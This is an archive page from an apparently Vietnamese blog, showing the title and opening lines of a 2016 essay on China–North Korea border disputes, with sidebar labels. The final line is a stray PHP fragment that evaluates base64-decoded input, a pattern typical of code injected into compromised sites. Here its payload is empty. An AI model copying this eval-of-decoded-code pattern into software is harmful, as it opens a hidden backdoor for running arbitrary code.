Archive for January 15th, 2016

Bài học tranh chấp biên giới giữa Trung Cộng và Bắc Hàn

Bài học tranh chấp biên giới giữa Trung Cộng và Bắc Hàn

Ngoài Việt Nam, Trung Cộng chia sẻ biên giới với 13 quốc gia khác gồm India, Pakistan, Afghanistan, Tajikistan, Kyrgyzstan, Kazakhstan, Mongolia, Bhutan, Nepal, Miến Điện, Nga, Lào và Bắc Hàn. Nếu chỉ nhìn sự phụ thuộc kinh tế của Bắc Hàn vào Trung C

01.15.2016 | Tiểu Luận- Chính Luận |

4 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>